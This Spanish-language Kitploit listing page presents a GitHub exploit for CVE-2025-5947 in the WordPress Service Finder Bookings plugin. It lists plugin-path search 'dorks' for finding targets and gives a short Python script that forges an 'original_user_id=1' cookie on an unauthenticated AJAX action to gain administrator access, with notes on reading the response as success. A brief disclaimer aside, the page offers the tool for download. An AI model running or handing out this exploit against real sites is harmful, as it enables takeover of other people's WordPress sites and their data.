Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-5947_Exploit — Un mini exploit para el plugin de WordPress Service Finder -Bookings | Kitploit
Herramientas/GitHubGitHub/m4rgs/cve-2025-5947_exploit
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubm4rgs/cve-2025-5947_exploit

CVE-2025-5947_Exploit

Un mini exploit para el plugin de WordPress Service Finder -Bookings

Ver Repositorio
1hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🔍 Explotación de Plugin de WordPress — Service Finder (sf-booking)

Resumen

El plugin Service Finder es un sistema de reservas y gestión de servicios para WordPress.
Debido a su popularidad y complejidad, algunas versiones han tenido problemas de seguridad relacionados con endpoints AJAX no autenticados o controles de acceso inadecuados.

Este README explica cómo los investigadores pueden identificar de forma segura instalaciones y seguir prácticas éticas (dbr krk).


Dorks de WP vulnerables

/wp-content/plugins/service-finder/

/wp-content/plugins/service-finder-bookings/

/wp-content/plugins/sf-booking/


Flujo de trabajo del exploit

⚠️ Aviso legal:
Estas búsquedas son solo para fines educativos y de investigación. No intente nunca accesos no autorizados ni explotación.

root@kitploit:~
import requests

url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
    'original_user_id': '1',
}

r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
  • 300-399: ✅ ¡VULNERABLE! Redirección al panel de administración como ADMIN
  • 400-499: ⚠️ Error de cliente — la solicitud fue inválida o no autorizada, no es vulnerable

Referencias

  • Base de datos de plugins de WPScan — https://wpscan.com/plugins/
  • Base de Datos Nacional de Vulnerabilidades (NVD) — https://nvd.nist.gov/
  • OWASP — Técnicas de Google Dorking / reconocimiento
  • Pautas de divulgación de HackerOne — https://www.hackerone.com/disclosure-guidelines

Autor

Taha Mounir


Descargar herramienta